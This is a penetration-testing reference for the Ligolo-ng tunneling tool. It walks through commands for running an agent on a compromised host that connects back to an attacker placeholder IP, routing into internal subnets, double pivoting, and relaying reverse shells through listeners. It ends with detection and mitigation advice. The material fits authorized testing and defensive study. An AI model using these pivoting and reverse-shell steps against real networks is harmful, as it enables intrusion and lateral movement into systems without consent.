Ligolo-ng
Overview
Ligolo-ng is a tunneling tool that creates a TUN interface on the attacker machine, routing traffic directly to the target network without SOCKS proxies or proxychains. This makes it faster and more transparent than SOCKS-based tools — all TCP/UDP traffic is routed natively through the kernel. Ligolo-ng uses an agent/proxy architecture with TLS-encrypted communication. Transfer the agent binary to the target; run the proxy on the attacker.
ATT&CK Mapping
- Tactic: TA0011 - Command and Control
- Technique: T1572 - Protocol Tunneling
Prerequisites
- Ligolo-ng proxy on the attacker, agent binary on the target
- Network connectivity between target and attacker (default port 11601)
- On Kali:
sudo apt install -y ligolo-ng - Root/sudo on attacker (TUN interface setup requires it)
Techniques
Basic Setup (Most Common)
Route traffic to an internal network through a compromised host.
Step 1 — Create TUN interface on attacker:
# Create TUN interface for ligolo-ng
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
Step 2 — Start proxy on attacker:
# Ligolo-ng
# https://github.com/nicocha30/ligolo-ng
ligolo-proxy -selfcert
The proxy listens on 0.0.0.0:11601 by default. Use -selfcert to auto-generate TLS certificates.
Step 3 — Run agent on target:
# Ligolo-ng
# https://github.com/nicocha30/ligolo-ng
ligolo-agent -connect <attacker_ip>:11601 -ignore-cert
Use -ignore-cert when the proxy uses -selfcert. For persistent connections, add -retry.
Step 4 — Select session and start tunnel (in proxy console):
ligolo-ng » session
Select the agent session with arrow keys, then view the agent's network interfaces:
[Agent : user@target] » ifconfig
Step 5 — Add route on attacker and start tunnel:
# Add route to the internal subnet (run in a separate terminal)
sudo ip route add 10.10.10.0/24 dev ligolo
# Start the tunnel in the ligolo-ng console
[Agent : user@target] » tunnel_start --tun ligolo
Now access the internal network directly — no proxychains needed:
# Direct access through the TUN interface
nmap -sT -Pn -p 445 10.10.10.100
nxc smb 10.10.10.100 -u <user> -p <password>
curl http://10.10.10.100
Custom Listening Port
# Ligolo-ng
# https://github.com/nicocha30/ligolo-ng
# On attacker — listen on port 443 instead of 11601
ligolo-proxy -selfcert -laddr 0.0.0.0:443
# On target — connect to custom port
ligolo-agent -connect <attacker_ip>:443 -ignore-cert
Multiple Subnets
Route multiple internal subnets through the same agent:
# Add routes to multiple subnets on the attacker
sudo ip route add 10.10.10.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo
Listeners (Reverse Connections Through the Agent)
Listeners forward ports from the agent (target) back to the proxy (attacker). Useful for receiving reverse shells from internal hosts through the tunnel.
In the ligolo-ng console (with a session selected):
# Forward agent port 4444 to attacker port 4444 (for reverse shells)
[Agent : user@target] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# Forward agent port 80 to attacker port 80 (for hosting payloads)
[Agent : user@target] » listener_add --addr 0.0.0.0:80 --to 127.0.0.1:80 --tcp
# List active listeners
[Agent : user@target] » listener_list
# Stop a listener by index
[Agent : user@target] » listener_stop 0
Example workflow — catch a reverse shell from an internal host:
# On attacker, start a listener
nc -lvnp 4444
# In ligolo-ng console, add listener on agent
# listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# Trigger reverse shell on internal host pointing to the agent's IP
# The connection flows: internal_host → agent:4444 → attacker:4444
Double Pivot
Chain through two compromised hosts to reach a deeper network.
# Network layout:
# Attacker → Pivot1 (10.10.10.0/24) → Pivot2 (172.16.0.0/24) → Internal
Step 1 — Set up first tunnel (Attacker ↔ Pivot1):
# On attacker
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert
# On Pivot1
ligolo-agent -connect <attacker_ip>:11601 -ignore-cert
# In proxy console: select Pivot1 session, start tunnel
# Add route: sudo ip route add 10.10.10.0/24 dev ligolo
# tunnel_start --tun ligolo
Step 2 — Create listener on Pivot1 for Pivot2 to connect through:
# In proxy console (Pivot1 session selected)
[Agent : user@pivot1] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:11601 --tcp
This forwards Pivot1 port 4444 to the proxy's listening port 11601.
Step 3 — Connect Pivot2 agent through Pivot1:
# On Pivot2 — connect through Pivot1's listener
ligolo-agent -connect <pivot1_ip>:4444 -ignore-cert
Step 4 — Start second tunnel:
# On attacker — add route for the deeper subnet
sudo ip route add 172.16.0.0/24 dev ligolo
Select the Pivot2 session in the proxy console and start the tunnel.
Agent with Auto-Retry
# Ligolo-ng
# https://github.com/nicocha30/ligolo-ng
# Agent reconnects automatically if connection drops
ligolo-agent -connect <attacker_ip>:11601 -ignore-cert -retry
Fingerprint Verification (More Secure)
Instead of -ignore-cert, pin the proxy's TLS certificate fingerprint:
# Ligolo-ng
# https://github.com/nicocha30/ligolo-ng
# The proxy prints its fingerprint on startup — copy it
# Then on target:
ligolo-agent -connect <attacker_ip>:11601 -accept-fingerprint <sha256_hex>
Detection Methods
Network-Based Detection
- TLS connections to non-standard port 11601 from internal hosts
- Sustained encrypted connections with bidirectional data transfer
- Traffic patterns consistent with tunneled scanning or lateral movement
Host-Based Detection
- Unknown binary named
ligolo-agentrunning on endpoints - TUN interface creation on systems that don't normally use VPN software
- New routing table entries pointing to TUN interfaces
Mitigation Strategies
- Application whitelisting — prevent execution of unauthorized binaries
- Egress filtering — restrict outbound connections from servers to known destinations on approved ports
- Network monitoring — detect TLS connections to non-standard ports from internal hosts
- Monitor routing changes — alert on new routes and TUN interface creation